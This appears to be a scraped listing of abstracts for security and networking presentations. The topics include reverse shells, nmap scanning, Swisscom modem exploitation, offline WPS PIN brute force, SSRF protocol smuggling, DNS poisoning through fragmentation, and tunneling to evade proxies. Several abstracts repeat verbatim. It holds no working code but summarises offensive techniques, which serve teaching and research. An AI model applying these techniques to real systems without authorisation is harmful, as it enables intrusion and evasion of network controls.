Netcat (nc) is a networking utility that can be used to transfer files, run commands remotely, and scan ports on remote systems. It allows establishing TCP and UDP connections to ports on remote systems. The document provides examples of using nc to scan ports, transfer files between systems, set up reverse shells, and perform basic network tasks and administration. Google dorking techniques are also presented for searching websites and finding specific pages or files using keywords, titles, and URLs. The Whois tool is demonstrated to query registration records for domain names and obtain information like registrar, IP address, and name servers.
The document discusses the nmap scanning tool and provides examples of using its basic scanning options. Nmap can scan for open ports on TCP, UDP, and other protocols. It can detect operating systems, banner grab services to identify software versions, and has options for port scanning, ping scanning entire networks, and more. Scripting options allow tasks like brute force attempts, information gathering, and vulnerability scanning.
The document discusses hacking the Swisscom modem by exploiting default credentials to gain access. Upon login, the author runs commands to investigate the system such as viewing configuration files and mapping the internal network. Various system details are discovered including the Linux kernel version and software components.
True stories on the analysis of network activity using Pythondelimitry
The document discusses network packet analysis using Python. It provides an overview of network analysis tools like Wireshark and tcpdump, and how to use them to analyze network traffic captured in a pcap file. It also discusses how to create and send network packets using Scapy for tasks like port scanning, and how to filter network traffic using IPv4/IPv6 packet filters like iptables. The document provides examples of summarizing pcap data and crafting network packets for various protocols.
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Андрей Шорин
В какой-то момент 3-й в мире работный сайт начал периодически падать на несколько минут. Сюрпризом стало то, что в этот раз действительно из-за сети.
Для масштабирования сервисов и их взаимодействия между собой hh.ru использует внутренний балансировщик. Обработку 25 тыс. запросов в секунду обеспечивают 5 серверов с nginx. Обращение к этим серверам балансирует коммутатор.
Я расскажу, как мы расследовали серию инцидентов, которая была вызвана нарушением протокола TCP при балансировке. И что мы придумали, чтобы продолжить безнаказанно его нарушать.
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Ontico
В какой-то момент 3-й в мире работный сайт начал периодически падать на несколько минут. Сюрпризом стало то, что в этот раз действительно из-за сети.
Для масштабирования сервисов и их взаимодействия между собой hh.ru использует внутренний балансировщик. Обработку 25 тыс. запросов в секунду обеспечивают 5 серверов с nginx. Обращение к этим серверам балансирует коммутатор.
Я расскажу, как мы расследовали серию инцидентов, которая была вызвана нарушением протокола TCP при балансировке. И что мы придумали, чтобы продолжить безнаказанно его нарушать.
The presentation addresses the most typical issues during network software development and testing, explains the causes and suggests solutions:
- overlapping IP networks
- invalid netmasks
- incomplete routing configuration
- incorrect local MAC addresses
- unidirectional packet generator and unicast flood
- disabled ethernet auto negotiation
Modern CPUs use various techniques to improve performance such as instruction pipelining, cache memory, superscalar execution, out-of-order execution, speculative execution, and branch prediction. However, these optimizations can introduce security vulnerabilities like Spectre and Meltdown attacks which exploit side effects of speculative execution in the CPU cache to leak secret data from memory. Speculative execution may process instructions early before branch resolution, potentially loading secret data into the cache where an attacker can detect it using precise timing measurements. While fixes have been developed, fully mitigating these issues remains an ongoing challenge for CPU architecture.
The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.
The document discusses the nmap scanning tool and provides examples of using its basic scanning options. Nmap can scan for open ports on TCP, UDP, and other protocols. It can detect operating systems, banner grab services to identify software versions, and has options for port scanning, ping scanning entire networks, and more. Scripting options allow tasks like brute force attempts, information gathering, and vulnerability scanning.
The document discusses hacking the Swisscom modem by exploiting default credentials to gain access. Upon login, the author runs commands to investigate the system such as viewing configuration files and mapping the internal network. Various system details are discovered including the Linux kernel version and software components.
True stories on the analysis of network activity using Pythondelimitry
The document discusses network packet analysis using Python. It provides an overview of network analysis tools like Wireshark and tcpdump, and how to use them to analyze network traffic captured in a pcap file. It also discusses how to create and send network packets using Scapy for tasks like port scanning, and how to filter network traffic using IPv4/IPv6 packet filters like iptables. The document provides examples of summarizing pcap data and crafting network packets for various protocols.
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Андрей Шорин
В какой-то момент 3-й в мире работный сайт начал периодически падать на несколько минут. Сюрпризом стало то, что в этот раз действительно из-за сети.
Для масштабирования сервисов и их взаимодействия между собой hh.ru использует внутренний балансировщик. Обработку 25 тыс. запросов в секунду обеспечивают 5 серверов с nginx. Обращение к этим серверам балансирует коммутатор.
Я расскажу, как мы расследовали серию инцидентов, которая была вызвана нарушением протокола TCP при балансировке. И что мы придумали, чтобы продолжить безнаказанно его нарушать.
Как HeadHunter удалось безопасно нарушить RFC 793 (TCP) и обойти сетевые лову...Ontico
В какой-то момент 3-й в мире работный сайт начал периодически падать на несколько минут. Сюрпризом стало то, что в этот раз действительно из-за сети.
Для масштабирования сервисов и их взаимодействия между собой hh.ru использует внутренний балансировщик. Обработку 25 тыс. запросов в секунду обеспечивают 5 серверов с nginx. Обращение к этим серверам балансирует коммутатор.
Я расскажу, как мы расследовали серию инцидентов, которая была вызвана нарушением протокола TCP при балансировке. И что мы придумали, чтобы продолжить безнаказанно его нарушать.
The presentation addresses the most typical issues during network software development and testing, explains the causes and suggests solutions:
- overlapping IP networks
- invalid netmasks
- incomplete routing configuration
- incorrect local MAC addresses
- unidirectional packet generator and unicast flood
- disabled ethernet auto negotiation
Modern CPUs use various techniques to improve performance such as instruction pipelining, cache memory, superscalar execution, out-of-order execution, speculative execution, and branch prediction. However, these optimizations can introduce security vulnerabilities like Spectre and Meltdown attacks which exploit side effects of speculative execution in the CPU cache to leak secret data from memory. Speculative execution may process instructions early before branch resolution, potentially loading secret data into the cache where an attacker can detect it using precise timing measurements. While fixes have been developed, fully mitigating these issues remains an ongoing challenge for CPU architecture.
The document discusses reverse engineering the firmware of Swisscom's Centro Grande modems. It identifies several vulnerabilities found, including a command overflow issue that allows complete control of the device by exceeding the input buffer, and multiple buffer overflow issues that can be exploited to execute code remotely by crafting specially formatted XML files. Details are provided on the exploitation techniques and timeline of coordination with Swisscom to address the vulnerabilities.
The document discusses an offline brute force attack method against the WiFi Protected Setup (WPS) protocol. It explains that many wireless access points and routers use weak pseudo-random number generators with small states that can be recovered, allowing an attacker to determine the nonces used in the WPS handshake and then brute force the PIN offline. It provides details on how the attack would work by recovering the PRNG state from the initial message and then determining the PIN. Vendors are shown to have weak responses or lack of acknowledgment of the issue, which affects many chipset and product brands that use a common reference implementation.
This document discusses various port scanning techniques used by hackers to discover services, operating systems, and open ports on target hosts. It explains common TCP scans like SYN scans which identify open and closed ports, and UDP scans. Timing options and techniques for hiding scans are also covered. The document provides examples of using the Nmap tool to perform scans and identify operating systems.
This document outlines a presentation on how a hacker views a website. It includes sections on introduction, demonstration, tools, CERT-FR, and questions. Tools mentioned include nmap, netdiscover, Wpscan, nessus, nikto, John, Burp, metasploit, sqlmap, and Github for information gathering, vulnerability assessment, and exploitation. It recommends checking the CERT-FR website and following their Twitter account for security advisories.
The document discusses various scan types available in the nmap port scanner program. It describes TCP connect scans which actively connect to ports, SYN stealth scans which send SYN packets to identify open and closed ports without fully establishing connections, and less common FIN, NULL and XMAS scans. It also covers ping scans to identify online systems, UDP scans, and options for customizing scans to avoid detection like altering timing and using decoys. The goal is to help users understand different scan techniques and how to choose scans suited to different target types or detection avoidance needs.
The document discusses various Linux network configuration and troubleshooting commands, including ifconfig for configuring network interfaces and viewing network settings, ping for testing network connectivity, traceroute for tracing the network route to a destination, and commands like netstat, dig, nslookup, route, host, arp, ethtool, iwconfig, and hostname for additional network tasks and information retrieval. It provides examples and brief explanations of how to use each command.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochAnne Nicolas
Although GnuPG 2 has been around for nearly 15 years, the old 1.4 version was still in wide use. With Debian and others making 2.1 the default, many interesting things can now be done. In this talk he will explain the advantages of modern key algorithms, like ed25519, and why gpg relaxed some of its more paranoid defaults. The new –quick commands of gpg for easily scriptable key management will be described as well as the new key discovery methods. Finally hints for integration of gpg into other programs will be given.
Werner Koch, g10code
Imagine you're tackling one of these evasive performance issues in the field, and your go-to monitoring checklist doesn't seem to cut it. There are plenty of suspects, but they are moving around rapidly and you need more logs, more data, more in-depth information to make a diagnosis. Maybe you've heard about DTrace, or even used it, and are yearning for a similar toolkit, which can plug dynamic tracing into a system that wasn't prepared or instrumented in any way.
Hopefully, you won't have to yearn for a lot longer. eBPF (extended Berkeley Packet Filters) is a kernel technology that enables a plethora of diagnostic scenarios by introducing dynamic, safe, low-overhead, efficient programs that run in the context of your live kernel. Sure, BPF programs can attach to sockets; but more interestingly, they can attach to kprobes and uprobes, static kernel tracepoints, and even user-mode static probes. And modern BPF programs have access to a wide set of instructions and data structures, which means you can collect valuable information and analyze it on-the-fly, without spilling it to huge files and reading them from user space.
In this talk, we will introduce BCC, the BPF Compiler Collection, which is an open set of tools and libraries for dynamic tracing on Linux. Some tools are easy and ready to use, such as execsnoop, fileslower, and memleak. Other tools such as trace and argdist require more sophistication and can be used as a Swiss Army knife for a variety of scenarios. We will spend most of the time demonstrating the power of modern dynamic tracing -- from memory leaks to static probes in Ruby, Node, and Java programs, from slow file I/O to monitoring network traffic. Finally, we will discuss building our own tools using the Python and Lua bindings to BCC, and its LLVM backend.
The document describes the configuration of a Dynamic Multipoint Virtual Private Network (DMVPN) using three phases. Phase 1 establishes IPsec and IKE tunnels between the hub router and spoke routers using EIGRP routing. Phase 2 optimizes the configuration by removing split horizon and enabling next hop self. Phase 3 enables features like NHRP redirect and shortcut to optimize network traffic flow.
The document discusses server-side request forgery (SSRF) vulnerabilities and techniques for exploiting and bypassing URL parsing issues to achieve protocol smuggling. It provides examples of exploiting URL parsers in various programming languages to conduct CR-LF injection and host/path injection. It also demonstrates abusing features of Glibc NSS and protocols like HTTPS to smuggle protocols over TLS SNI or bypass patches. The talk appears to be about advanced SSRF attacks and protocol smuggling techniques.
Tomas Hlavacek - IP fragmentation attack on DNSDefconRussia
This document summarizes an IP fragmentation attack on DNS resolvers. It exploits IP fragmentation and reassembly to reduce the entropy for cache poisoning from 32 bits to 16 bits. There are two types of attacks - one triggers fragmentation through spoofed ICMP messages, while the other registers a specially crafted zone to generate oversized responses. The attacks allow modifying DNS response fragments off-path to poison caches. Defenses include DNSSEC and workaround like ignoring certain ICMP and limiting response sizes.
NMAP is a network scanning tool that can perform various types of scans, including port scans, version detection scans, and OS detection scans. It has many options to control the type and timing of scans. The document provides details on NMAP scan types like TCP SYN scans, ping scans using different packet types, and port scanning techniques. It also covers topics like port states, common ports, scan timing and output options.
The document discusses dynamic port scanning (DPS), which integrates ARP poisoning into port scanning to dynamically spoof the source IP address of scan packets. DPS works by poisoning the ARP cache of the target host or gateway so that scan replies are delivered to the scanning machine regardless of the spoofed source IP. This allows the scan to appear as if it is coming from many machines, improving stealth, while still obtaining results unlike traditional IP spoofing techniques. The document outlines how DPS works, current spoofing methods, advantages over other techniques, and limitations.
This document summarizes key aspects of Unicode and security issues related to Unicode encoding. It discusses the history of character encodings like ASCII and EBCDIC, the role of the Unicode Consortium, and algorithms in the Unicode standard like normalization, collation, and case folding. It also highlights potential security issues like lookalike characters, right-to-left override, non-characters, and normalization forms that can bypass filters or cause buffer overflows.
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
This document provides information on various debugging and profiling tools that can be used for Ruby including:
- lsof to list open files for a process
- strace to trace system calls and signals
- tcpdump to dump network traffic
- google perftools profiler for CPU profiling
- pprof to analyze profiling data
It also discusses how some of these tools have helped identify specific performance issues with Ruby like excessive calls to sigprocmask and memcpy calls slowing down EventMachine with threads.
Networking in Linux discusses DNS related commands in Linux. It begins by listing DNS concepts like zones and records. It then demonstrates commands like nslookup, host and dig to query DNS records like A, MX, NS, SOA records and perform operations like reverse lookups. It shows how to use specific nameservers, change ports and timeouts. The document provides examples of using these tools to troubleshoot DNS issues like propagation.
This document contains cheat sheets and code snippets for penetration testing. It covers topics like recon, DNS enumeration, Nmap scanning, Netcat, SNMP, MySQL, MSSQL, web enumeration, RDP exploitation, file inclusion, XSS, SQL injection, and post-exploitation techniques for Linux and Windows. The document is intended to help penetration testers and those studying for the OSCP certification by providing examples for common tasks without relying on Metasploit.
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
The document discusses findings from analyzing the web interfaces and firmware of various VoIP phone models. Several vulnerabilities were found, including:
- Cross-site scripting (XSS) in AudioCodes 405HD phone web interface allowing injection of scripts
- Information leakage in Gigaset Maxwell Basic phone web interface revealing if an admin is logged in
- Authentication bypass in Gigaset Maxwell Basic phone by manipulating the session token
The methodology involved analyzing phone web traffic, extracting and emulating firmware, and investigating code like PHP files. Many phones were found to have weaknesses in their cryptography implementation or use of plaintext credentials.
This document provides an overview of a presentation on Linux networking. The agenda includes topics like ARP, interface manipulation, network troubleshooting, routing, network bonding, network namespaces, kernel network parameters, and interview questions. It notes that the presentation will demonstrate over 30 commands related to networking and that there are often multiple ways to solve exercises. It encourages asking questions to aid learning.
The document discusses an offline brute force attack method against the WiFi Protected Setup (WPS) protocol. It explains that many wireless access points and routers use weak pseudo-random number generators with small states that can be recovered, allowing an attacker to determine the nonces used in the WPS handshake and then brute force the PIN offline. It provides details on how the attack would work by recovering the PRNG state from the initial message and then determining the PIN. Vendors are shown to have weak responses or lack of acknowledgment of the issue, which affects many chipset and product brands that use a common reference implementation.
This document discusses various port scanning techniques used by hackers to discover services, operating systems, and open ports on target hosts. It explains common TCP scans like SYN scans which identify open and closed ports, and UDP scans. Timing options and techniques for hiding scans are also covered. The document provides examples of using the Nmap tool to perform scans and identify operating systems.
This document outlines a presentation on how a hacker views a website. It includes sections on introduction, demonstration, tools, CERT-FR, and questions. Tools mentioned include nmap, netdiscover, Wpscan, nessus, nikto, John, Burp, metasploit, sqlmap, and Github for information gathering, vulnerability assessment, and exploitation. It recommends checking the CERT-FR website and following their Twitter account for security advisories.
The document discusses various scan types available in the nmap port scanner program. It describes TCP connect scans which actively connect to ports, SYN stealth scans which send SYN packets to identify open and closed ports without fully establishing connections, and less common FIN, NULL and XMAS scans. It also covers ping scans to identify online systems, UDP scans, and options for customizing scans to avoid detection like altering timing and using decoys. The goal is to help users understand different scan techniques and how to choose scans suited to different target types or detection avoidance needs.
The document discusses various Linux network configuration and troubleshooting commands, including ifconfig for configuring network interfaces and viewing network settings, ping for testing network connectivity, traceroute for tracing the network route to a destination, and commands like netstat, dig, nslookup, route, host, arp, ethtool, iwconfig, and hostname for additional network tasks and information retrieval. It provides examples and brief explanations of how to use each command.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsBishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
Kernel Recipes 2017 - Modern Key Management with GPG - Werner KochAnne Nicolas
Although GnuPG 2 has been around for nearly 15 years, the old 1.4 version was still in wide use. With Debian and others making 2.1 the default, many interesting things can now be done. In this talk he will explain the advantages of modern key algorithms, like ed25519, and why gpg relaxed some of its more paranoid defaults. The new –quick commands of gpg for easily scriptable key management will be described as well as the new key discovery methods. Finally hints for integration of gpg into other programs will be given.
Werner Koch, g10code
Imagine you're tackling one of these evasive performance issues in the field, and your go-to monitoring checklist doesn't seem to cut it. There are plenty of suspects, but they are moving around rapidly and you need more logs, more data, more in-depth information to make a diagnosis. Maybe you've heard about DTrace, or even used it, and are yearning for a similar toolkit, which can plug dynamic tracing into a system that wasn't prepared or instrumented in any way.
Hopefully, you won't have to yearn for a lot longer. eBPF (extended Berkeley Packet Filters) is a kernel technology that enables a plethora of diagnostic scenarios by introducing dynamic, safe, low-overhead, efficient programs that run in the context of your live kernel. Sure, BPF programs can attach to sockets; but more interestingly, they can attach to kprobes and uprobes, static kernel tracepoints, and even user-mode static probes. And modern BPF programs have access to a wide set of instructions and data structures, which means you can collect valuable information and analyze it on-the-fly, without spilling it to huge files and reading them from user space.
In this talk, we will introduce BCC, the BPF Compiler Collection, which is an open set of tools and libraries for dynamic tracing on Linux. Some tools are easy and ready to use, such as execsnoop, fileslower, and memleak. Other tools such as trace and argdist require more sophistication and can be used as a Swiss Army knife for a variety of scenarios. We will spend most of the time demonstrating the power of modern dynamic tracing -- from memory leaks to static probes in Ruby, Node, and Java programs, from slow file I/O to monitoring network traffic. Finally, we will discuss building our own tools using the Python and Lua bindings to BCC, and its LLVM backend.
The document describes the configuration of a Dynamic Multipoint Virtual Private Network (DMVPN) using three phases. Phase 1 establishes IPsec and IKE tunnels between the hub router and spoke routers using EIGRP routing. Phase 2 optimizes the configuration by removing split horizon and enabling next hop self. Phase 3 enables features like NHRP redirect and shortcut to optimize network traffic flow.
The document discusses server-side request forgery (SSRF) vulnerabilities and techniques for exploiting and bypassing URL parsing issues to achieve protocol smuggling. It provides examples of exploiting URL parsers in various programming languages to conduct CR-LF injection and host/path injection. It also demonstrates abusing features of Glibc NSS and protocols like HTTPS to smuggle protocols over TLS SNI or bypass patches. The talk appears to be about advanced SSRF attacks and protocol smuggling techniques.
Tomas Hlavacek - IP fragmentation attack on DNSDefconRussia
This document summarizes an IP fragmentation attack on DNS resolvers. It exploits IP fragmentation and reassembly to reduce the entropy for cache poisoning from 32 bits to 16 bits. There are two types of attacks - one triggers fragmentation through spoofed ICMP messages, while the other registers a specially crafted zone to generate oversized responses. The attacks allow modifying DNS response fragments off-path to poison caches. Defenses include DNSSEC and workaround like ignoring certain ICMP and limiting response sizes.
NMAP is a network scanning tool that can perform various types of scans, including port scans, version detection scans, and OS detection scans. It has many options to control the type and timing of scans. The document provides details on NMAP scan types like TCP SYN scans, ping scans using different packet types, and port scanning techniques. It also covers topics like port states, common ports, scan timing and output options.
The document discusses dynamic port scanning (DPS), which integrates ARP poisoning into port scanning to dynamically spoof the source IP address of scan packets. DPS works by poisoning the ARP cache of the target host or gateway so that scan replies are delivered to the scanning machine regardless of the spoofed source IP. This allows the scan to appear as if it is coming from many machines, improving stealth, while still obtaining results unlike traditional IP spoofing techniques. The document outlines how DPS works, current spoofing methods, advantages over other techniques, and limitations.
This document summarizes key aspects of Unicode and security issues related to Unicode encoding. It discusses the history of character encodings like ASCII and EBCDIC, the role of the Unicode Consortium, and algorithms in the Unicode standard like normalization, collation, and case folding. It also highlights potential security issues like lookalike characters, right-to-left override, non-characters, and normalization forms that can bypass filters or cause buffer overflows.
Nmap not only a port scanner by ravi rajput comexpo security awareness meet Ravi Rajput
As every coin has two side as a same way we know only the single side of Nmap which is port scanning.
While researching I found that a lot more other than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah it won't work as efficiently as of MSF.
This can replace the use of acunetix and other paid version scanner.
This document provides information on various debugging and profiling tools that can be used for Ruby including:
- lsof to list open files for a process
- strace to trace system calls and signals
- tcpdump to dump network traffic
- google perftools profiler for CPU profiling
- pprof to analyze profiling data
It also discusses how some of these tools have helped identify specific performance issues with Ruby like excessive calls to sigprocmask and memcpy calls slowing down EventMachine with threads.
Networking in Linux discusses DNS related commands in Linux. It begins by listing DNS concepts like zones and records. It then demonstrates commands like nslookup, host and dig to query DNS records like A, MX, NS, SOA records and perform operations like reverse lookups. It shows how to use specific nameservers, change ports and timeouts. The document provides examples of using these tools to troubleshoot DNS issues like propagation.
This document contains cheat sheets and code snippets for penetration testing. It covers topics like recon, DNS enumeration, Nmap scanning, Netcat, SNMP, MySQL, MSSQL, web enumeration, RDP exploitation, file inclusion, XSS, SQL injection, and post-exploitation techniques for Linux and Windows. The document is intended to help penetration testers and those studying for the OSCP certification by providing examples for common tasks without relying on Metasploit.
DEF CON 27 - HUBER AND ROSKOSCH - im on your phone listening attacking voip c...Felipe Prado
The document discusses findings from analyzing the web interfaces and firmware of various VoIP phone models. Several vulnerabilities were found, including:
- Cross-site scripting (XSS) in AudioCodes 405HD phone web interface allowing injection of scripts
- Information leakage in Gigaset Maxwell Basic phone web interface revealing if an admin is logged in
- Authentication bypass in Gigaset Maxwell Basic phone by manipulating the session token
The methodology involved analyzing phone web traffic, extracting and emulating firmware, and investigating code like PHP files. Many phones were found to have weaknesses in their cryptography implementation or use of plaintext credentials.
This document provides an overview of a presentation on Linux networking. The agenda includes topics like ARP, interface manipulation, network troubleshooting, routing, network bonding, network namespaces, kernel network parameters, and interview questions. It notes that the presentation will demonstrate over 30 commands related to networking and that there are often multiple ways to solve exercises. It encourages asking questions to aid learning.
Matt Batten (sleepZ3R0) spoke at BSIDES AUGUSTA and BSIDES RDU these are our slides. Hope you can learn and benefit from them. If you have any questions feel free to send us messages on twitter we will always respond.
Network Test Automation - Net Ops Coding 2015Hiroshi Ota
1. The document discusses network test automation using tools like Serverspec, Infrataster, Lbspec, and Rspec-ssltls to test network configurations and connectivity. These tools use Ruby and RSpec to test servers, DNS, firewalls, load balancers, and SSL/TLS without requiring changes to production systems.
2. Examples are provided showing how to test server reachability, DNS entries, firewall rules, load balancer behavior, and SSL/TLS settings using the different tools. Tests can be run to check configurations without affecting live networks.
3. Running the RSpec tests produces results indicating how many examples passed and failed, allowing engineers to test network changes with confidence before deploying
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPWalid Umar
This document provides instructions for completing a competency test on networking skills. It details how to:
1) Plan a network topology with a server, gateway, and client devices.
2) Perform subnetting calculations to divide IP addresses into public and private networks.
3) Assemble and install a Debian server, configure networking and services like DHCP, Apache, and Squid proxy server.
4) Configure the router and firewall rules for network address translation and proxy access.
EBU DRW 2011 - CRC-mmbTools - Software Radio WorkshopPascal Charest
The document provides an overview of the CRC-mmbTools software suite for digital radio broadcasting. It discusses:
1. The CRC-mmbTools live CD and website, which contain various open-source tools for DAB/DAB+ broadcasting.
2. How to use the major tools - CRC-OpenMokast, CRC-DabMod, CRC-Dwap, and CRC-DabMux - including examples of basic and complex configurations.
3. How the tools support different types of service encoding for audio and multimedia content.
4. An overview of how the tools can be used for other modulations like FM and DRM broadcasting in addition to DAB
This document provides an overview of various networking tools in Linux, including commands for network configuration (ifconfig, route), connectivity testing (ping, traceroute), name resolution (host, nslookup), port and protocol inspection (netstat, tcpdump), and secure remote access (SSH, PuTTY). It also covers tools for firewall management (ufw), network mapping (Nmap), raw socket programming (netcat), link status (ethtool), and more. Examples are given for common tasks like viewing routing tables, capturing packets, remotely controlling systems, and accessing services over Telnet versus SSH. A references section at the end provides additional learning resources.
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
The document discusses using Nmap to perform network scanning and reconnaissance. It provides an overview of Nmap, describing common scan types like TCP and UDP scans. It also covers useful Nmap options for tasks like service and operating system detection. The document demonstrates the Nmap Scripting Engine for tasks like vulnerability scanning and brute force attacks. It provides examples of commands for different scan types and scripts.
This document discusses home automation and the r-house gem. It provides an overview of home automation categories like lighting, climate and appliances. It also summarizes the r-house architecture which includes components like the interceptor, devices, and database. Finally, it demonstrates how to initialize and connect the interceptor component and register events using the r-house gem.
This document provides an overview of how to contribute to the cPython source code. It discusses running benchmarks to understand performance differences between loops inside and outside functions. It encourages contributing to improve coding skills and help the open source community. The steps outlined are to clone the cPython source code repository, resolve any dependencies during building, review open issues on bugs.python.org, and work on resolving issues - starting with easier ones. Tips are provided such as commenting when taking ownership of an issue, reproducing bugs before working on them, writing tests for code changes, and updating documentation.
This document discusses various techniques for advanced network forensics, including user/password cracking using Hydra, port scanning using Nmap, signature detection by analyzing file types in network payloads, and detecting converted file formats like MIME encoding. It provides examples of using tools like Hydra, Nmap, and Snort rules to detect activities like password cracking, port scanning, and the transmission of files like PDFs and images over the network.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
Jaime Piña, @variadico, Software Engineer at Apcera
Microservice issues are networking issues. Fixing code in your app is easy, but the hard part of using microservices is the networking. How do you actually know if you're sending what you think you are? Why does this request fail in my app, but not when I use curl? Is this service very slow or is it up at all?
This talk will help demystify some common problems you might experience while building out your collection of microservices. Once you can find the issue, it becomes way easier to fix.
Filip palian mateuszkocielski. simplest ownage human observed… routersYury Chemerkin
This document discusses identifying and exploiting vulnerabilities in consumer routers. It provides examples of analyzing firmware from various router models, including the (--E)-LINK DIR-120 and DIR-300, to gain unauthorized access. Methods discussed include reverse engineering firmware, exploiting services like telnet that are exposed without authentication, and modifying the read-only filesystem. The document also talks about using these compromised routers as bots for botnets performing activities like DDoS attacks, cryptocurrency mining, and spam/phishing campaigns. It provides examples of real botnets like Psyb0t that have exploited routers.
Rete di casa e raspberry pi - Home network and Raspberry Pi Daniele Albrizio
The document discusses setting up a Raspberry Pi 3 to improve home network privacy and security. It describes installing Kali Linux on the Raspberry Pi and configuring it with NAT, DHCP, and an access point to monitor network traffic. It also covers using Pi-hole for ad blocking and tools like Wireshark for sniffing and analyzing traffic patterns on the home network. The goal is to gain more visibility and control over devices connected to the network to limit information leakage and unauthorized behavior.
In this slide, I introduced how Gameboy works and how to build a Gameboy emulator using Rust programming language. Also, I introduce how to migrate the Rust emulator to Webassembly, so that we can run the emulator using browser.
Video of presentation of this slide:
https://www.youtube.com/watch?v=LqcEg3IVziQ
Este documento discute os principais desafios de segurança da informação no ambiente global, incluindo a guerra cibernética, a internet das coisas, espionagem digital, BYOD e engenharia social. Apresenta também as informações disponíveis no underground hacker e as ferramentas usadas em ataques, como redes anônimas e técnicas de engenharia social.
O documento apresenta um curso introdutório sobre redes de computadores e a Internet. Seu objetivo geral é fornecer aos estudantes um conceito geral sobre como as redes funcionam e as tecnologias envolvidas, abordando tópicos como estrutura da Internet, protocolos, serviços, camadas, história e conceitos fundamentais como borda, núcleo e acesso à rede.
O documento descreve a ferramenta AdminDeviceLan para bloqueio de dispositivos de entrada e saída em computadores. A ferramenta possui módulos cliente e servidor e permite bloquear dispositivos como CD-ROM, disquetes e pendrives em uma ou mais máquinas de forma remota. O tutorial mostra como instalar os módulos, conectar o cliente ao servidor e aplicar regras de bloqueio em um computador de exemplo.
[1] O documento apresenta um tutorial sobre como utilizar a ferramenta TrueCrypt para criptografar arquivos e dispositivos, incluindo a criação de pastas criptografadas, instalação do idioma português e criptografia de partições e pendrives.
[2] É demonstrado o download e instalação do TrueCrypt e do pacote de idioma português, assim como a criação e montagem de um contêiner criptografado para armazenar arquivos secretos.
[3] Também é mostrado como preparar um pend
[1] O documento apresenta um trabalho sobre Group Policy Objects (GPO) realizado por Alex Sandro Bastos, Cristiano Carvalho e Patricia Gonçalves para a disciplina de Sistemas de Controle de Acesso da pós-graduação em Segurança de Redes de Computadores da Universidade Estácio de Sá sob a orientação do professor Cassio Ramos. [2] O trabalho descreve o que são GPOs, como funcionam, como criar políticas de grupo no Active Directory e exemplos práticos de configurações de políticas de segurança que podem ser aplicadas em um
O documento apresenta técnicas de tunelamento para bypassar proteções como proxies, incluindo o uso de HTTP Tunnel (htc e hts), HTTP CONNECT Tunneling, ProxyTunnel e SSH Tunnel para acesso remoto, e ICMP Tunnel (ptunnel). Vários exemplos são dados para ilustrar como configurar cada técnica em diferentes cenários.
O documento fornece um tutorial passo-a-passo sobre como usar o TrueCrypt para criptografar arquivos e discos rígidos de forma segura. Ele explica como criar um volume criptografado, montá-lo e desmontá-lo, bem como configurar um disco removível criptografado e criptografar todo o disco rígido do computador.
